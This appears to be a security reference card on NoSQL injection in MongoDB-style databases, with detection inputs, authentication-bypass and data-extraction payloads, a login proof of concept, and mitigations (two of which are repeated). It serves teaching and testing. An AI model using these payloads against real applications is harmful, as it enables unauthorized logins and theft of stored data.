High Severity | OWASP A03:2021
🟠 NoSQL Injection
🧠 Description
What is NoSQL Injection?
NoSQL injection attacks exploit vulnerabilities in NoSQL databases (like MongoDB, CouchDB, Redis). Attackers inject malicious code through application inputs that are used in NoSQL queries without proper sanitization.
NoSQL Injection allows:
- Bypass authentication
- Extract sensitive data
- Modify or delete data
- Execute commands (in some cases)
🏷️ Classification
- Type: NoSQL Injection
- Databases: MongoDB, CouchDB, Redis, Cassandra
- Attack Vectors: Injection via JSON, array operators, regex
🎯 Attack Surface
- ✅ Login forms
- ✅ Search functionality
- ✅ User profile queries
- ✅ API endpoints
🔍 Detection
- Test with:
{"$ne": null} - Test with:
{"$gt": ""} - Test with:
' || '1'=='1
💣 Basic Payloads
MongoDB Authentication Bypass
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"$or": [{"username": "admin"}, {"username": "root"}]}
Extract Data
{"username": {"$regex": "^ad"}}
{"$where": "this.password.length > 0"}
📝 Proof of Concept
# Login request with NoSQL injection
POST /login HTTP/1.1
{"username": {"$ne": ""}, "password": {"$ne": ""}}
# Returns success - logged in as first user!
💥 Impact
Severity: HIGH
- Authentication bypass
- Data exfiltration
- Full database access
🛡️ Mitigation
✅ Use parameterized queries: Don't concatenate user input
✅ Input validation: Validate types and formats
✅ Sanitize operators: Strip $ operators from input
✅ Input validation: Validate types and formats
✅ Sanitize operators: Strip $ operators from input
🛠️ Tools
NoSQLMap
NoSQL injection tool
Burp
Manual testing